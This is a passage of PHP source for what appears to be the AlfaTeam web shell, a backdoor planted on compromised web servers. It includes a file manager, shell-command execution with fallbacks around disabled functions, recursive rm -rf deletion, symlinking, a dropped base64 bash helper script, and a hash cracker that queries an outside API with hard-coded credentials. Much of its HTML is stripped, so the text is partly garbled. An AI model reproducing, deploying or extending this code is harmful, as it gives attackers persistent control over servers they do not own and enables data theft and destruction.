foreach ($data as $key => $val){

$array = array();

foreach($val as $k => $v){

$array[$k] = $v;

}

echo "";

}

echo '
".$array['tdName']."
';

}

function alfaphp2xml(){

alfahead();

AlfaNum(8,9,10,7,6,5,4,3);

echo "
| Shell For vBulletin |
>'); return false;\" method='post'>








";

if($_POST['alfa2']&&$_POST['alfa2']=='>>'){

echo __pre()."
';

}

echo '
';

alfafooter();

}

function alfacpcrack(){

alfahead();

echo '
| Hash Tools |
| DeCrypter | | Hash Analyzer | 
';

if($_POST['alfa1']=='dec'){

$algorithms = array('md5'=>'MD5','md4'=>'MD4','sha1'=>'SHA1','sha256'=>'SHA256','sha384'=>'SHA384','sha512'=>'SHA512','ntlm'=>'NTLM');

echo '
| DeCrypter |





>\',this.alg.value); return false;">
Decrypt Method:
  

';

if($_POST['alfa3'] == '>>'){

$hash = $_POST['alfa2'];

if(!empty($hash)){

$hash_type = $_POST['alfa4'];

$email = "solevisible@gmail.com";

$code = "7b9fa79f92c3cd96";

$target = "https://md5decrypt.net/Api/api.php?hash=".$hash."&hash_type=".$hash_type."&email=".$email."&code=".$code;

$resp = @file_get_contents($target);

if($resp==''){

$get = new AlfaCURL();

$resp = $get->Send($target);

}

echo __pre().'
';

switch($resp){

    case('CODE ERREUR : 001'):echo "You exceeded the 400 allowed request per day";break;

    case('CODE ERREUR : 003'):echo "Your request includes more than 400 hashes.";break;

    case('CODE ERREUR : 004'):echo "The type of hash you provide in the argument hash_type doesn't seem to be valid";break;

    case('CODE ERREUR : 005'):echo "The hash you provide doesn't seem to match with the type of hash you set.";break;

}

if(substr($resp,0,4)!='CODE'&&$resp!=''){

echo "Result: ".$resp."";

}elseif(substr($resp,0,4)!='CODE'){

echo "NoT Found
";

}

echo('
');

}

}

}

if($_POST['alfa1']=='analyzer'){

echo '
| Hash Analyzer |



>\');return false;">


Hash: 
  

';

if($_POST['alfa3'] == '>>'){

$hash = $_POST['alfa2'];

if(!empty($hash)){

$curl = new AlfaCURL();

$resp = $curl->Send("https://md5decrypt.net/en/HashFinder/","post","hash={$hash}&crypt=Search");

echo(__pre().'
');

if(preg_match('#
(.*?)
#',$resp,$s)){

    echo(''.$s[1].'');

}else{

    echo('Not Found...!');

}

echo('

');

}

}

}

echo '
';

alfafooter();

}

function alfafooter(){

if(!isset($_POST['ajax'])){

echo "




















Make File : 
 


Make Dir : 
 


Delete : 
 


Chmod : 
 






Change Dir : 
 


Read File : 
 






Execute :



















Upload file: 
[ ./AlfaTeam © 2012-".date('Y')." ]
Donate Us ! solevisible[at]gmail.com @solevisible













Sql Manager






<<
Clear all
History






0
Database



0
Options



0
Editor



0
Cgi Shell













    


        


            


                

                


                

                

                


                    

                       

                          

                             

                             

                             

                             

                          

                          

                             

                             

                             

                             

                          

                          

                             

                             

                             

                             

                          

                          

                             

                             

                             

                             

                          

                          

                             

                             

                             

                             

                          

                       

                    
ModeUserGroupWorld
Read
Write
Execute
Permission


                



            

        


            

            

        


    



";?>








}}

if (!function_exists("posix_getpwuid") && (strpos(@ini_get('disable_functions'), 'posix_getpwuid')===false)) {

function posix_getpwuid($p) {return false;} }

if (!function_exists("posix_getgrgid") && (strpos(@ini_get('disable_functions'), 'posix_getgrgid')===false)) {

function posix_getgrgid($p) {return false;} }

function alfaWhich($p) {

$path = alfaEx('which ' . $p,false,false);

if(!empty($path))

return strlen($path);

return false;

}

function alfaSize($s) {

if($s >= 1073741824)

return sprintf('%1.2f', $s / 1073741824 ). ' GB';

elseif($s >= 1048576)

return sprintf('%1.2f', $s / 1048576 ) . ' MB';

elseif($s >= 1024)

return sprintf('%1.2f', $s / 1024 ) . ' KB';

else

return $s . ' B';

}

function alfaPerms($p) {

if (($p & 0xC000) == 0xC000)$i = 's?';

elseif (($p & 0xA000) == 0xA000)$i = 'l?';

elseif (($p & 0x8000) == 0x8000)$i = '-?';

elseif (($p & 0x6000) == 0x6000)$i = 'b?';

elseif (($p & 0x4000) == 0x4000)$i = 'd?';

elseif (($p & 0x2000) == 0x2000)$i = 'c?';

elseif (($p & 0x1000) == 0x1000)$i = 'p?';

else $i = 'u?';

$i .= (($p & 0x0100) ? 'r?' : '-');

$i .= (($p & 0x0080) ? 'w?' : '-');

$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's?' : 'x?' ) : (($p & 0x0800) ? 'S?' : '-'));

$i .= (($p & 0x0020) ? 'r?' : '-');

$i .= (($p & 0x0010) ? 'w?' : '-');

$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's?' : 'x?' ) : (($p & 0x0400) ? 'S?' : '-'));

$i .= (($p & 0x0004) ? 'r?' : '-');

$i .= (($p & 0x0002) ? 'w?' : '-');

$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't?' : 'x?' ) : (($p & 0x0200) ? 'T?' : '-'));

return $i;

}

function alfaPermsColor($f,$isbash=false){

$class = "";

$num = "";

$human = "";

if($isbash){

$class = $f["class"];

$num = $f["num"];

$human = $f["human"];

}else{

$num = substr(sprintf('%o', @fileperms($f)),-4);

$human = alfaPerms(@fileperms($f));

if(!@is_readable($f))

$class = "main_red_perm";

elseif (!@is_writable($f))

$class = "main_white_perm";

else

$class = "main_green_perm";

}

return ''.$num.' >> '.$human.'';

}

if(!function_exists("scandir")) {

function scandir($dir) {

$dh = opendir($dir);

while (false !== ($filename = readdir($dh)))

$files[] = $filename;

return $files;

}

}

function reArrayFiles($file_post){

$file_ary = array();

$file_count = count($file_post['name']);

$file_keys = array_keys($file_post);

for ($i=0; $i<$file_count; $i++) {

foreach ($file_keys as $key) {

$file_ary[$i][$key] = $file_post[$key][$i];

}

}

return $file_ary;

}

function _alfa_can_runCommand($cgi=true,$cache=true){

    if(isset($_COOKIE["alfa_canruncmd"])&&$cache){

        return true;

    }

    if(strlen(alfaEx("whoami",false,$cgi))>0){

        $_COOKIE["alfa_canruncmd"] = true;

        return true;

    }

    return false;

}

function _alfa_symlink($target, $link){

    $phpsym = function_exists("symlink");

    if($phpsym){

        @symlink($target, $link);

    }else{

        alfaEx("ln -s '".addslashes($target)."' '".addslashes($link)."'");

    }

}

function _alfa_file_exists($file,$cgi=true){

    if(@file_exists($file)){

        return true;

    }else{

        if(strlen(alfaEx("ls -la '".addslashes($file)."'",false,$cgi))>0){

            return true;

        }

    }

    return false;

}

function _alfa_file($file,$cgi=true){

    $array = @file($file);

    if(!$array){

        if(strlen(alfaEx("id",false,$cgi))>0){

            $data = alfaEx('cat "'.addslashes($file).'"',false,$cgi);

            if(strlen($data)>0){

                return explode("\n", $data);

            }else{

                return false;

            }

        }else{

            return false;

        }

    }else{

        return $array;

    }

}

function _alfa_is_writable($file){

    $check = false;

    $check = @is_writable($file);

    if(!$check){

        if(_alfa_can_runCommand()){

            $check = alfaEx('[ -w "'.trim(addslashes($file)).'" ] && echo "yes" || echo "no"');

            if($check == "yes"){

                $check = true;

            }else{

                $check = false;

            }

        }

    }

    return $check;

}

function _alfa_is_dir($dir,$mode="-d"){

    $check = false;

    $check = @is_dir($dir);

    if($mode == "-e"){

        $check = @is_file($dir);

    }

    if(!$check){

        if(_alfa_can_runCommand()){

            $check = alfaEx('[ "'.trim($mode).'" "'.trim(addslashes($dir)).'" ] && echo "yes" || echo "no"');

            if($check == "yes"){

                return true;

            }else{

                return false;

            }

        }

    }

    return $check;

}

function _alfa_load_ace_options($base){

    return 'Theme: Language: Soft Wrap:  | Font Size:  |  | ';

}

function alfaFilesMan2(){

    alfahead();

    AlfaNum(8,9,10,7,6,5,4);

    echo '
';

    alfaFooter();

}

function copy_paste($c,$s,$d){

if(@is_dir($c.$s)){

@mkdir($d.$s);

$h = @opendir($c.$s);

while (($f = @readdir($h)) !== false)

if (($f != ".") and ($f != ".."))

copy_paste($c.$s.'/',$f, $d.$s.'/');

} elseif(is_file($c.$s))

@copy($c.$s, $d.$s);

}

function alfaFilesMan(){

if(!empty ($_COOKIE['alfa_f']))

$_COOKIE['alfa_f'] = @unserialize($_COOKIE['alfa_f']);

if(!empty($_POST['alfa1'])){

switch($_POST['alfa1']){

case 'uploadFile':

$move_cmd_file = false;

$alfa_canruncmd = false;

if($GLOBALS['glob_chdir_false']){

    $alfa_canruncmd = _alfa_can_runCommand(true,true);

    $move_cmd_file = true;

}

if(_alfa_is_writable($GLOBALS['cwd'])){

$files = reArrayFiles($_FILES['f']);

$ret_files = array();

foreach($files as $file){

if($move_cmd_file&&$alfa_canruncmd){

    alfaEx("cat '".addslashes($file['tmp_name'])."' > '".addslashes($_POST["c"]."/".$file['name'])."'");

}else{

    if(@move_uploaded_file($file['tmp_name'],$file['name'])){

        $ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($file['name'])):array("name" => "????");

        $gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($file['name'])):array("name" => "????");

        $file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($file['name']):"????");

        $file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($file['name']):"????");

        $file_modify = @date('Y-m-d H:i:s', @filemtime($file['name']));

        $file_perm = alfaPermsColor($file['name']);

        $file_size = @filesize($file['name']);

        $ret_files[] = array("name" => $file['name'], "size" => alfaSize($file_size), "perm" => $file_perm, "modify" => $file_modify, "owner" => $file_owner."/".$file_group);

    }

}

}

if(!$move_cmd_file){

    echo json_encode($ret_files);

}

}else{

    echo "noperm";

    return;

}

if(!$move_cmd_file){

return;

}

break;

case 'mkdir':

$new_dir_cmd = false;

if($GLOBALS['glob_chdir_false']){

    if(_alfa_can_runCommand(true,true)){

        if(_alfa_is_writable($GLOBALS['cwd'])){

            if(!_alfa_is_dir(trim($_POST['alfa2']))){

                alfaEx("cd '".trim(addslashes($_POST['c']))."';mkdir '".trim(addslashes($_POST['alfa2']))."'");

                echo "";

            }else{

                echo "";

            }

        }else{

            echo "";

        }

    }else{

        echo "";

    }

}else{

    if(_alfa_is_writable($GLOBALS['cwd'])){

        if(!_alfa_is_dir(trim($_POST['alfa2']))){

            if(!@mkdir(trim($_POST['alfa2']))){

                echo "";

            }else{

                echo "";

            }

        }else{

            echo "";

        }

    }else{

        echo "";

    }

}

break;

case 'delete':

function deleteDir($path){

$path = (substr($path,-1)=='/') ? $path:$path.'/';

$dh = @opendir($path);

while(($item = @readdir($dh)) !== false){

$item = $path.$item;

if((basename($item) == "..") || (basename($item) == "."))

continue;

$type = @filetype($item);

if ($type == "dir")

deleteDir($item);

else

@unlink($item);

}

@closedir($dh);

@rmdir($path);

}

if(is_array(@$_POST['f']))

foreach($_POST['f'] as $f){

if($f == '..')

continue;

$f = rawurldecode($f);

if($GLOBALS["glob_chdir_false"]){

    if(_alfa_can_runCommand(true,true)){

        alfaEx("rm -rf '".addslashes($_POST['c'].'/'.$f)."'");

    }

}else{

alfaEx("rm -rf '".addslashes($f)."'",false,false);

if(@is_dir($f))

deleteDir($f);

else

@unlink($f);

}

}

if(@is_dir(rawurldecode(@$_POST['alfa2']))&&rawurldecode(@$_POST['alfa2'])!='..'){

deleteDir(rawurldecode(@$_POST['alfa2']));

alfaEx("rm -rf '".addslashes($_POST['alfa2'])."'",false,false);

}else{

@unlink(rawurldecode(@$_POST['alfa2']));

}

if($GLOBALS["glob_chdir_false"]){

    $source = rawurldecode(@$_POST['alfa2']);

    if($source!='..'&&!empty($source)){

        if(_alfa_can_runCommand(true,true)){

            alfaEx("cd '".trim(addslashes($_POST['c']))."';rm -rf '".addslashes($source)."'");

        }

    }

}

if(is_array($_POST['f']))

return;

break;

case 'paste':

if($_COOKIE['alfa_act'] == 'copy'&&isset($_COOKIE['alfa_f'])){

foreach($_COOKIE['alfa_f'] as $f)

copy_paste($_COOKIE['alfa_c'],$f, $GLOBALS['cwd']);

}elseif($_COOKIE['alfa_act'] == 'move'&&isset($_COOKIE['alfa_f'])){

function move_paste($c,$s,$d){

if(@is_dir($c.$s)){

@mkdir($d.$s);

$h = @opendir($c.$s);

while (($f = @readdir($h)) !== false)

if(($f != ".") and ($f != ".."))

copy_paste($c.$s.'/',$f, $d.$s.'/');

}elseif(@is_file($c.$s))

@copy($c.$s, $d.$s);

}

foreach($_COOKIE['alfa_f'] as $f)

@rename($_COOKIE['alfa_c'].$f, $GLOBALS['cwd'].$f);

}elseif($_COOKIE['alfa_act'] == 'zip'&&isset($_COOKIE['alfa_f'])){

if(class_exists('ZipArchive')){

$zip = new ZipArchive();

$zipX = "alfa_".rand(1,1000).".zip";

if($zip->open($zipX, 1)){

@chdir($_COOKIE['alfa_c']);

foreach($_COOKIE['alfa_f'] as $f){

if($f == '..')continue;

if(@is_file($_COOKIE['alfa_c'].$f))

$zip->addFile($_COOKIE['alfa_c'].$f, $f);

elseif(@is_dir($_COOKIE['alfa_c'].$f)){

$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/'));

foreach($iterator as $key=>$value){

$key = str_replace('\\','/',realpath($key));

if(@is_dir($key)){

if(in_array(substr($key, strrpos($key,'/')+1),array('.', '..')))continue;

}else{$zip->addFile($key,$key);}}}}

@chdir($GLOBALS['cwd']);

$zip->close();

__alert('>> '.$zipX.' << is created...');}}

}elseif($_COOKIE['alfa_act'] == 'unzip'&&isset($_COOKIE['alfa_f'])){

if(class_exists('ZipArchive')){

$zip = new ZipArchive();

foreach($_COOKIE['alfa_f'] as $f) {

if($zip->open($_COOKIE['alfa_c'].$f)){

$zip->extractTo($_COOKIE['alfa_cwd']);

$zip->close();}}}}

unset($_COOKIE['alfa_f']);

break;

default:

if(!empty($_POST['alfa1'])){

if(in_array($_POST['alfa1'], array("copy", "move", "zip", "unzip"))){

__alfa_set_cookie('alfa_act', @$_POST['alfa1']);

__alfa_set_cookie('alfa_f', @serialize($_POST['f']));

__alfa_set_cookie('alfa_c', @$_POST['c']);

return;

}

}

break;

}

}

$dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);

if(preg_match("#(.*)\/\.\.#", $_POST['c'], $res)){

    $path = explode('/', $res[1]);

    array_pop($path);

    $_POST['c'] = implode('/', $path);

}

$cmd_dir = false;

if($dirContent === false){

    if(_alfa_can_runCommand(true,true)){

        $tmp_getdir_path = @$_COOKIE["alfachdir_bash_path"];

        @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));

        if(!isset($_COOKIE["alfachdir_bash"])||@!file_exists($tmp_getdir_path."/alfacgiapi/getdir.alfa")){

            $bash = "jZTfb5swEMef4a+4uaYkSmmS/YpEwsOkqVNfO+1hSqKKggnWwI4MEaFppL3vv9xfUtsYSKpMWh6I7/O9O9vcHVfvxrtCjJ8oGxep/fX+IcBT+/7ue4DdFXNtEqUc0BLZCRdAgTLAg6wALwQsfYdziLkN8rcNyzRAio0xRRrRBJZLwBSCANDtLYLra/D2Mr5KaZSCIGGcUfZrCOv1HMqUMB3VJcOD1gO8BLBiw86DBhpoO6G2RVnCZURRhiV4ESDnznd++M433yl856c/cULf+YLaLJa6n+u7+gzgCXWdUIiwhsViAQirbMi2ynpLAnzQynKyPurdeMWI6OjU0I3gu21H30tqFfS5j/6gSM5jmtQd+2hit0TkbJd3/NMJT3d5yDrls1EYqR571XWb1yALNBgApcFkLp8LfLjqfI6KjEYw7Av2JstIFu/QWT6m1J8e//7+05Qy5oy8PdNZuKxAU21zGV3zyXQ2m6G+vJbVXhVNlGJAkw/FQm5X7eVDVPKxF5V00LXVmb1KFkaVTyVUraSYOGFnm0Q84yJAeUjZ40YQwvRRZUKSmXT/FSo7tSR9aEEu+AgStx79abHqHf0SYipIVHJRn22kW0tpJ0fqYwTZ7LJQyM7OiL7uy8tlB5Jvy/rfbkWdP/GMRqCm6ML+OrA5tp7zwwqxMCcr5MNKTsEK3ch/5WpIs1RQT4GhZq2wHgODzVphNQqGNksFm2kwuDWUYJrEKJ3VSrpdTkRjt7IuzYls7OONrZu4+Z4djmv0Cg==";

            $tmp_getdir_path = alfaWriteTocgiapi("getdir.alfa",$bash);

            __alfa_set_cookie("alfachdir_bash", "true");

            __alfa_set_cookie("alfachdir_bash_path", $tmp_getdir_path);

        }

        $dirContent = alfaEx("cd ".$tmp_getdir_path."/alfacgiapi;sh getdir.alfa '".addslashes(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd'])."'");

        $dirContent = json_decode($dirContent, true);

        if(is_array($dirContent)){

            array_pop($dirContent);

            $cmd_dir = true;

        }else{

            $dirContent = false;

        }

    }

}

alfahead();

AlfaNum(8,9,10,7,6,5,4);

$count_dirContent = @count($dirContent);

if($count_dirContent > 300){

    @$_COOKIE["alfa_limited_files"] = 100;

}

$alfa_sort_by = isset($_COOKIE["alfa_sort_by"]) ? $_COOKIE["alfa_sort_by"] : 'name';

$alfa_limited_files = isset($_COOKIE["alfa_limited_files"]) ? (int)$_COOKIE["alfa_limited_files"] : 0;

$alfa_files_page_number = isset($_POST["pagenum"]) ? (int)$_POST["pagenum"] : 1;

$alfa_filesman_direction = isset($_COOKIE["alfa_filesman_direction"]) ? $_COOKIE["alfa_filesman_direction"] : 'asc';

$files_page_count = 1;

if($alfa_limited_files > 0){

    $files_page_count = ceil($count_dirContent/$alfa_limited_files);

    if($files_page_count > 1){

        $files_page_count++;

    }

}

echo '
Filter: Sort By: Direction:  limit: Files Count: '.($count_dirContent-1).'
';

if($dirContent == false){

echo '

!!! Access Denied !!!

';

alfaFooter();

return;

}

global $sort;

$sort = array('name', 1);

if(isset($_COOKIE["alfa_sort_by"]) && !empty($_COOKIE["alfa_sort_by"])){

    $sort[0] = $_COOKIE["alfa_sort_by"];

}

if(!empty($_POST['alfa1'])) {

if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['alfa1'], $match))

$sort = array($match[1], (int)$match[2]);

}

if($alfa_files_page_number > ($files_page_count-1)){

    $alfa_files_page_number = 1;

}

$checkbox_rand = rand(11111, 99999);

echo "
";

$dirs = $files = array();

$n = $count_dirContent;

if($n > $alfa_limited_files && $alfa_limited_files > 0){

    $n = ($alfa_limited_files * $alfa_files_page_number);

    if($n > $count_dirContent){

        $n = $count_dirContent;

    }

}

$i = 0;

if($alfa_limited_files > 0 && $alfa_files_page_number > 1){

    $i = $alfa_limited_files * ($alfa_files_page_number - 1);

}

$page_builder = get_pagination_links($alfa_files_page_number,$files_page_count -1);

$cmd_dir_backp = "";

for(;$i<$n;$i++){

if($cmd_dir){

$filename = $dirContent[$i]["name"];

$file_owner = $dirContent[$i]["owner"];

$file_group = $dirContent[$i]["group"];

$file_modify = @date('Y-m-d H:i:s', $dirContent[$i]["modify"]);

$file_perm = alfaPermsColor(array("class"=>$dirContent[$i]["permcolor"],"num"=>$dirContent[$i]["permnum"],"human"=>$dirContent[$i]["permhuman"]),true);

$file_size = $dirContent[$i]["size"];

if(substr($dirContent[$i]["name"], 0 ,1) == "/"){

$file_path = $dirContent[$i]["name"];

$dirContent[$i]["name"] = "..";

$filename = $dirContent[$i]["name"];

}else{

$file_path = $GLOBALS['cwd']."/".$dirContent[$i]["name"];

}

}else{

$filename = $dirContent[$i];

$ow = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($GLOBALS['cwd'].$filename)):array("name" => "????");

$gr = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($GLOBALS['cwd'].$filename)):array("name" => "????");

$file_owner = $ow['name']?$ow['name']:(function_exists("fileowner")?@fileowner($GLOBALS['cwd'].$filename):"????");

$file_group = $gr['name']?$gr['name']:(function_exists("filegroup")?@filegroup($GLOBALS['cwd'].$filename):"????");

$file_modify = @date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $filename));

$file_perm = alfaPermsColor($GLOBALS['cwd'].$filename);

$file_size = @filesize($GLOBALS['cwd'].$filename);

$file_path = $GLOBALS['cwd'].$filename;

}

$tmp = array('name' => $filename,

'path' => $file_path,

'modify' => $file_modify,

'perms' => $file_perm,

'size' => $file_size,

'owner' => $file_owner,

'group' => $file_group

);

if($filename == ".." && !$cmd_dir){

    $tmp["path"] = str_replace("\\", "/", realpath($file_path));

}

if(!$cmd_dir){

if(@is_file($file_path)){

$arr_mrg = array('type' => 'file');

if(@is_link($file_path)){

$arr_mrg["link"] = readlink($tmp['path']);

}

$files[] = array_merge($tmp, $arr_mrg);

}elseif(@is_link($file_path)){

$dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));

}elseif(@is_dir($file_path)&& ($filename != ".")){

$dirs[] = array_merge($tmp, array('type' => 'dir'));

}

}else{

    if($dirContent[$i]["type"]=="file"){

        $files[] = array_merge($tmp, array('type' => 'file'));

    }else{

        if($dirContent[$i]["name"] != "."){

            $dirs[] = array_merge($tmp, array('type' => 'dir'));

        }

    }

}

}

$GLOBALS['sort'] = $sort;

function alfaCmp($a, $b) {

if($GLOBALS['sort'][0] != 'size')

return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);

else

return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);

}

usort($files, "alfaCmp");

usort($dirs, "alfaCmp");

if(isset($_COOKIE["alfa_filesman_direction"])&& !empty($_COOKIE["alfa_filesman_direction"])){

    if($_COOKIE["alfa_filesman_direction"] == 'desc'){

        $files = array_reverse($files);

        $dirs = array_reverse($dirs);

    }

}

$files = array_merge($dirs, $files);

$l=0;

$cc=0;

foreach($files as $f){

$f['name'] = htmlspecialchars($f['name']);

$newname = mb_strlen($f['name'], 'UTF-8')>60?mb_substr($f['name'], 0, 60, 'utf-8').'...':$f['name'];

$checkbox = 'checkbox_'.$checkbox_rand.$cc;

$raw_name = rawurlencode($f['name']);

$icon = $GLOBALS['DB_NAME']['show_icons']?'':'';

$style = $GLOBALS['DB_NAME']['show_icons']?'position:relative;display:inline-block;bottom:12px;':'';

echo '';

$l = $l?0:1;

$cc++;

}

echo "
NameSizeModifyOwner/GroupPermissionsActions
'.$icon.''.(($f['type']=='file')?(isset($f['link'])?'[L] ':'').alfaSize($f['size']):$f['type']).''.$f['modify'].''.$f['owner'].'/'.$f['group'].''.

$f['perms'].'		R T'.(($f['type']=='file')?' E D':'').' X 













".$page_builder."
";

alfafooter();

}

function get_pagination_links($current_page, $total_pages){

    $links = "";

    if ($total_pages >= 1 && $current_page <= $total_pages) {

        $links .= "<<";

        $selected_page = "";

        if($current_page == 1){

            $selected_page = " active-page-number";

        }

        $links .= "1";

        $i = max(2, $current_page - 5);

        if ($i > 2)

            $links .= "...";

        for (; $i < min($current_page + 6, $total_pages); $i++) {

            if($i == $current_page){

                $selected_page = " active-page-number";

            }else{

                $selected_page = "";

            }

            $links .= "{$i}";

        }

        if ($i != $total_pages)

            $links .= "...";

        $selected_page = " last-page-number";

        if($current_page == $total_pages){

            $selected_page .= " active-page-number";

        }

        $links .= "{$total_pages}";

        $links .= ">>";

    }

    return $links;

}

function alfaFilesTools(){

alfahead();

echo '
';

if(isset($_POST['alfa1']))$_POST['alfa1'] = rawurldecode($_POST['alfa1']);

$alfa1_decoded = $_POST['alfa1'];

$chdir_fals = false;

if(!@chdir($_POST['c'])){

    $chdir_fals = true;

    $_POST['alfa1'] = $_POST["c"]."/".$_POST["alfa1"];

    $alfa_canruncmd = _alfa_can_runCommand(true,true);

    if($alfa_canruncmd){

        $slashed_alfa1 = addslashes($_POST['alfa1']);

        $file_info = explode(":", alfaEx('stat -c "%F:%U:%G:%s:%Y:0%a:%A" "'.$slashed_alfa1.'"'));

        $perm_color_class = alfaEx("if [[ -w '".$slashed_alfa1."' ]]; then echo main_green_perm; elif [[ -r '".$slashed_alfa1."' ]]; then echo main_white_perm; else echo main_red_perm; fi");

    }

}

if($_POST['alfa2'] == 'auto'){

if(is_array(@getimagesize($_POST['alfa1']))){

$_POST['alfa2'] = 'image';

}else{

    $_POST['alfa2'] = 'view';

    if($chdir_fals){

        if($alfa_canruncmd){

            $mime = explode(":", alfaEx("file --mime-type '".addslashes($_POST['alfa1'])."'"));

            $mimetype = $mime[1];

            if(!empty($mimetype)){

                if(strstr($mimetype, "image")){

                    $_POST['alfa2'] = 'image';

                }

            }

        }

    }

}

}

if($_POST['alfa2'] == "rename" && !empty($_POST['alfa3']) && @is_writable($_POST['alfa1'])){$rename_cache = $_POST['alfa3'];}

if(@$_POST['alfa2'] == 'mkfile'){

$_POST['alfa1'] = trim($_POST['alfa1']);

if($chdir_fals&&$alfa_canruncmd){

    if(_alfa_is_writable($_POST["c"])){

        alfaEx("cd '".addslashes($_POST["c"])."';touch '".addslashes($alfa1_decoded)."'");

        $_POST['alfa2'] = "edit";

    }

}

if(!@file_exists($_POST['alfa1'])){

$fp = @fopen($_POST['alfa1'], 'w');

if($fp){

$_POST['alfa2'] = "edit";

fclose($fp);

}

}else{

$_POST['alfa2'] = "edit";

}

}

if(!_alfa_file_exists(@$_POST['alfa1'])){

echo __pre()."
!...FILE DOEST NOT EXITS...!
";

alfaFooter();

return;

}

if($chdir_fals){

$filesize = $file_info[3];

$uid["name"] = $file_info[1];

$gid["name"] = $file_info[2];

$permcolor = alfaPermsColor(array("class"=>$perm_color_class,"num"=>$file_info[5],"human"=>$file_info[6]),true);

}else{

$uid = function_exists("posix_getpwuid")&&function_exists("fileowner")?@posix_getpwuid(@fileowner($_POST['alfa1'])):'';

$gid = function_exists("posix_getgrgid")&&function_exists("filegroup")?@posix_getgrgid(@filegroup($_POST['alfa1'])):'';

if(!$uid&&!$gid){

$uid['name'] = function_exists("fileowner")?@fileowner($_POST['alfa1']):'';

$gid['name'] = function_exists("filegroup")?@filegroup($_POST['alfa1']):'';

}

$permcolor = alfaPermsColor($_POST['alfa1']);

$filesize = @filesize($_POST['alfa1']);

if(!isset($uid['name'],$gid['name'])||empty($uid['name'])||empty($gid['name'])){

    if(_alfa_can_runCommand()){

        list($uid['name'],$gid['name']) = explode(":", alfaEx('stat -c "%U:%G" "'.addslashes($_POST["c"]."/".$_POST["alfa1"]).'"'));

    }

}

}

if(substr($_POST['alfa1'], 0, 7) == "phar://"){

    $alfa_file_directory = $_POST['alfa1'];

}else{

    $alfa_file_directory = str_replace("//", "/",($chdir_fals?"":$_POST['c'].'/').$_POST['alfa1']);

}

echo '
Name: '.htmlspecialchars(basename($alfa1_decoded)).' Size: '.alfaSize($filesize).' Permission: '.$permcolor.' Owner/Group: '.$uid['name'].'/'.$gid['name'].' Directory: '.dirname($alfa_file_directory).'
';

if(empty($_POST['alfa2']))$_POST['alfa2'] = 'view';

if(!_alfa_is_dir($_POST['alfa1'])){

$m = array('View', 'Download', 'Highlight', 'Chmod', 'Rename', 'Touch', 'Delete', 'Image', 'Hexdump');

$ftype = "file";

}else{

$m = array('Chmod', 'Rename', 'Touch');

$ftype = "dir";

}

echo('';

switch($_POST['alfa2']){

case 'view':case 'edit':

@chdir($_POST['c']);

$disabled_btn = "";

if(!@is_writable($_POST['alfa1'])&&!_alfa_is_writable($_POST['alfa1'])){

$disabled_btn = "disabled=disabled";

$disabled_btn_style= 'background: #ff0000;color: #fff;';

}

if(!empty($_POST['alfa3'])){

$_POST['alfa3'] = substr($_POST['alfa3'],1);

$time = @filemtime($_POST['alfa1']);

$fp = @__write_file($_POST['alfa1'],$_POST['alfa3']);

if($chdir_fals&&$alfa_canruncmd){

    $rname = $alfa1_decoded;

    $randname = $rname.rand(111,9999);

    $filepath = dirname($_SERVER["SCRIPT_FILENAME"])."/".$randname;

    if($fp = @__write_file($filepath ,$_POST['alfa3'])){

        alfaEx("mv '".addslashes($filepath)."' '".addslashes($_POST["alfa1"])."';rm -f '".addslashes($filepath)."'");

    }

}

if($fp){

echo 'Saved!
';

@touch($_POST['alfa1'],$time,$time);

}

}

echo '
'._alfa_load_ace_options("editor").'  
';

echo htmlspecialchars(__read_file($_POST['alfa1']));

echo '
';

break;

case 'highlight':

@chdir($_POST['c']);

if(@is_readable($_POST['alfa1'])){

echo '
';

$code = @highlight_file($_POST['alfa1'],true);

echo str_replace(array(''), array(''),$code).'
';

}

break;

case 'delete':

@chdir($_POST['c']);

if(@is_writable($_POST['alfa1'])||$GLOBALS["glob_chdir_false"]){

$deleted = true;

if(!@unlink($_POST['alfa1'])){

    $deleted = false;

    if($alfa_canruncmd){

        if(_alfa_is_writable($_POST['alfa1'])){

            alfaEx("rm -f '".addslashes($_POST['alfa1'])."'");

            $deleted = true;

        }

    }

}

if($deleted)echo 'File Deleted...';else echo 'Error...';}

break;

case 'chmod':

@chdir($_POST['c']);

if(!empty($_POST['alfa3'])){

$perms = 0;

for($i=strlen($_POST['alfa3'])-1;$i>=0;--$i)

$perms += (int)$_POST['alfa3'][$i]*pow(8, (strlen($_POST['alfa3'])-$i-1));

if(!@chmod($_POST['alfa1'], $perms)){

if($chdir_fals&&$alfa_canruncmd){

alfaEx("cd '".addslashes($_POST["c"])."';chmod ".addslashes($_POST['alfa3'])." '".addslashes($alfa1_decoded)."'");

echo('Success!');

}else{

echo 'Can\'t set permissions!
';}

}else{echo('Success!');}

}

clearstatcache();

AlfaNum(8,9,10,7,6,5,4,2,1);

if($chdir_fals){

    $file_perm = $file_info[5];

}else{

    $file_perm = substr(sprintf('%o', @fileperms($_POST['alfa1'])),-4);

}

echo '
';

break;

case 'hexdump':

@chdir($_POST['c']);

$c = __read_file($_POST['alfa1']);

$n = 0;

$h = array('00000000
','','');

$len = strlen($c);

for ($i=0; $i<$len; ++$i) {

$h[1] .= sprintf('%02X',ord($c[$i])).' ';

switch ( ord($c[$i]) ) {

case 0: $h[2] .= ' '; break;

case 9: $h[2] .= ' '; break;

case 10: $h[2] .= ' '; break;

case 13: $h[2] .= ' '; break;

default: $h[2] .= $c[$i]; break;

}

$n++;

if ($n == 32) {

$n = 0;
